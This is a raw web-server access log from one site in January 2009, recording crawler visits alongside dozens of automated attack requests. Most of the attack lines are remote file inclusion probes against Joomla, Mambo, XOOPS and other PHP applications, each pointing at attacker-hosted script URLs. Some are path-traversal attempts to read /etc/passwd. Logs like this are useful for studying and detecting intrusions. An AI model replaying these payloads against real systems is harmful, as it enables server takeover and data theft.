72.30.65.25 - - [30/Jan/2009:10:07:08 -0800] "GET /logs/access_081208.log HTTP/1.0" 200 3244331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.226.133.29 - - [30/Jan/2009:10:07:09 -0800] "GET /logs/access_080130.log//errors.php?error=http://www.unitydayhouston.com//components/com_login/idste.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.146.44.64 - - [30/Jan/2009:10:07:23 -0800] "GET /logs/index2.php?x=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.146.44.64 - - [30/Jan/2009:10:07:24 -0800] "GET /index2.php?x=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.146.44.64 - - [30/Jan/2009:10:07:24 -0800] "GET /logs/access_080526.log/index2.php?x=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:07:42 -0800] "GET /logs/access_080905.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:07:43 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95181 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:07:44 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:08:00 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:08:00 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:10:08:09 -0800] "GET /logs/access_080601.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:09:11 -0800] "GET /logs/access_080601.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.186.61.66 - - [30/Jan/2009:10:09:59 -0800] "GET /oneadmin/newspublish/include.php?path[docroot]=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:11:10 -0800] "GET /logs/access_080322.log/templates/tmpl_dfl/scripts/index.php?dir[inc]=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
148.245.102.115 - - [30/Jan/2009:10:12:28 -0800] "GET /logs/access_080614.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.djrogerm.com/assets/flash/win.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [30/Jan/2009:10:12:28 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.djrogerm.com/assets/flash/win.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.245.102.115 - - [30/Jan/2009:10:12:28 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.djrogerm.com/assets/flash/win.id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:10:12:56 -0800] "GET /logs/access_080211.log%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:10:12:56 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:10:12:57 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:10:13:05 -0800] "GET /logs/access_081220.log%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.115.111.245 - - [30/Jan/2009:10:13:14 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.dmulk.com"
209.172.33.230 - - [30/Jan/2009:10:14:21 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [30/Jan/2009:10:14:21 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:14:47 -0800] "GET /logs/hw3.php?daysonly=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:14:48 -0800] "GET /logs/access_080912.log/hw3.php?daysonly=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:14:49 -0800] "GET /hw3.php?daysonly=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.209.39 - - [30/Jan/2009:10:14:52 -0800] "GET /logs/access_081117.log/hw3.php?daysonly=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:15:03 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:15:03 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:10:15:04 -0800] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.172.33.230 - - [30/Jan/2009:10:15:06 -0800] "GET /logs/access_080211.log%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [30/Jan/2009:10:15:06 -0800] "GET /logs/access_081220.log%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.251.42 - - [30/Jan/2009:10:15:08 -0800] "GET /logs/access_080928.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:15:14 -0800] "GET /logs/access_080711.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.219.29 - - [30/Jan/2009:10:15:30 -0800] "GET /logs/access_080928.log/protection.php?action=logout&siteurl=http://www.radioficko.com/chat/chat/uploaddir/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.219.29 - - [30/Jan/2009:10:15:31 -0800] "GET /protection.php?action=logout&siteurl=http://www.radioficko.com/chat/chat/uploaddir/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.219.29 - - [30/Jan/2009:10:15:31 -0800] "GET /logs/protection.php?action=logout&siteurl=http://www.radioficko.com/chat/chat/uploaddir/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:10:15:39 -0800] "GET /logs/access_080421.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:10:15:39 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:10:15:39 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
194.30.160.11 - - [30/Jan/2009:10:15:58 -0800] "GET /phplive/setup/header.php?css_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [30/Jan/2009:10:16:01 -0800] "GET /logs/access_080321.log//phplive/setup/header.php?css_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [30/Jan/2009:10:16:01 -0800] "GET /phplive/setup/header.php?css_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.30.160.11 - - [30/Jan/2009:10:16:01 -0800] "GET /logs//phplive/setup/header.php?css_path=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.33.230 - - [30/Jan/2009:10:16:05 -0800] "GET /logs/access_080211.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [30/Jan/2009:10:16:05 -0800] "GET /logs/access_080928.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.karnatakajesuits.net/apps/ccmail/data/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:16:24 -0800] "GET /logs/hw3.php?daysonly=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:16:24 -0800] "GET /logs/access_080912.log/hw3.php?daysonly=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:16:24 -0800] "GET /hw3.php?daysonly=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.189.224.21 - - [30/Jan/2009:10:16:24 -0800] "GET /logs/access_081117.log/hw3.php?daysonly=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.186.61.66 - - [30/Jan/2009:10:16:29 -0800] "GET /logs/access_080311.log//oneadmin/newspublish/include.php?path[docroot]=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.186.61.66 - - [30/Jan/2009:10:16:29 -0800] "GET /oneadmin/newspublish/include.php?path[docroot]=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.186.61.66 - - [30/Jan/2009:10:16:30 -0800] "GET /logs//oneadmin/newspublish/include.php?path[docroot]=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:16:34 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:16:34 -0800] "GET /logs/access_080711.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:16:34 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.186.61.66 - - [30/Jan/2009:10:16:40 -0800] "GET /logs/access_080710.log//oneadmin/newspublish/include.php?path[docroot]=http://www.kimstroy.by//assets/images/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.22 - - [30/Jan/2009:10:16:42 -0800] "GET /poll/png.php?include_path=http://www.nazdar.ru/forum/phpBB3/language/ru/iso.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.247.173.202 - - [30/Jan/2009:10:17:17 -0800] "GET /logs/access_080913.log/index.php?content=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.247.173.202 - - [30/Jan/2009:10:17:17 -0800] "GET /logs/index.php?content=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.247.173.202 - - [30/Jan/2009:10:17:19 -0800] "GET /index.php?content=http://gumansin.com/id.txt?? HTTP/1.1" 200 94640 "-" "Mozilla/5.0" "www.dmulk.com"
66.152.162.116 - - [30/Jan/2009:10:17:46 -0800] "GET /logs/access_080501.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:17:57 -0800] "GET /logs/access_080905.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:17:57 -0800] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:17:57 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 200 95621 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:18:03 -0800] "GET /logs/access_080527.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.63.18.78 - - [30/Jan/2009:10:18:57 -0800] "GET /logs/access_080913.log/index.php?content=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.63.18.78 - - [30/Jan/2009:10:18:57 -0800] "GET /logs/index.php?content=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.63.18.78 - - [30/Jan/2009:10:18:58 -0800] "GET /index.php?content=http://gumansin.com/id.txt?? HTTP/1.1" 200 94656 "-" "Mozilla/5.0" "www.dmulk.com"
67.76.163.60 - - [30/Jan/2009:10:19:12 -0800] "GET /logs/access_080316.log//errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.76.163.60 - - [30/Jan/2009:10:19:12 -0800] "GET /errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.101.4.49 - - [30/Jan/2009:10:19:36 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [30/Jan/2009:10:19:36 -0800] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [30/Jan/2009:10:19:36 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [30/Jan/2009:10:19:36 -0800] "GET /logs/access_080113.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.76.163.60 - - [30/Jan/2009:10:20:06 -0800] "GET /logs/access_080316.log//errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.76.163.60 - - [30/Jan/2009:10:20:06 -0800] "GET /errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.76.163.60 - - [30/Jan/2009:10:20:06 -0800] "GET /logs//errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:20:07 -0800] "GET /logs/access_080905.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:20:07 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 200 95605 "-" "libwww-perl/5.812" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:20:20 -0800] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:20:27 -0800] "GET /logs/access_080527.log//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.101.4.49 - - [30/Jan/2009:10:21:25 -0800] "GET /logs/access_081227.log%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.65.25 - - [30/Jan/2009:10:21:54 -0800] "GET /logs/access_080309.log HTTP/1.0" 200 1507328 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:10:22:17 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.keken.web.id/psybnc/bot.pl?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:22:17 -0800] "GET /logs/access_080621.log%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.174.137 - - [30/Jan/2009:10:22:18 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.keken.web.id/psybnc/bot.pl?? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
87.101.4.49 - - [30/Jan/2009:10:22:21 -0800] "GET /logs/access_081227.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.67.13.250 - - [30/Jan/2009:10:22:27 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mhasbi.com/ra.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
202.67.13.250 - - [30/Jan/2009:10:22:27 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mhasbi.com/ra.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
70.126.70.54 - - [30/Jan/2009:10:22:38 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5" "dmulk.com"
69.10.133.18 - - [30/Jan/2009:10:22:47 -0800] "GET /logs/index.php?content=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.10.133.18 - - [30/Jan/2009:10:22:48 -0800] "GET /logs/access_080913.log/index.php?content=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.10.133.18 - - [30/Jan/2009:10:22:48 -0800] "GET /index.php?content=http://gumansin.com/id.txt?? HTTP/1.1" 200 94656 "-" "Mozilla/5.0" "www.dmulk.com"
67.76.163.60 - - [30/Jan/2009:10:22:53 -0800] "GET /logs/access_080905.log//errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.76.163.60 - - [30/Jan/2009:10:22:53 -0800] "GET /errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.76.163.60 - - [30/Jan/2009:10:22:53 -0800] "GET /logs//errors.php?error=http://madrigaldelavera.es/joomla/mambots/editors/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.16.155 - - [30/Jan/2009:10:23:13 -0800] "GET /logs/access_080702.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.singok.es.kr/bbs/data/C555/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.237.76.92 - - [30/Jan/2009:10:23:54 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/lucasnoki/botscan/newbotscanbag1.txt? HTTP/1.1" 200 95567 "-" "libwww-perl/5.79" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:24:26 -0800] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.11 - - [30/Jan/2009:10:24:27 -0800] "GET /index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 200 95153 "-" "libwww-perl/5.805" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:24:35 -0800] "GET /logs/access_081222.log//board//include/print_category.php?setup[use_category]=1&dir=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:24:35 -0800] "GET /board//include/print_category.php?setup[use_category]=1&dir=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:24:35 -0800] "GET /logs/access_081124.log//board//include/print_category.php?setup[use_category]=1&dir=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:24:35 -0800] "GET /logs//board//include/print_category.php?setup[use_category]=1&dir=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:24:40 -0800] "GET /logs/access_080322.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:24:40 -0800] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:24:40 -0800] "GET /index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 200 95085 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.209.25 - - [30/Jan/2009:10:24:41 -0800] "GET /logs/access_080314.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:24:45 -0800] "GET /logs//board//include/print_category.php?setup[use_category]=1&dir=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:24:48 -0800] "GET /logs/access_081124.log//board//include/print_category.php?setup[use_category]=1&dir=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.30.59.131 - - [30/Jan/2009:10:24:49 -0800] "GET /logs/access_081222.log//board//include/print_category.php?setup[use_category]=1&dir=http://h1.ripway.com/69696969/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
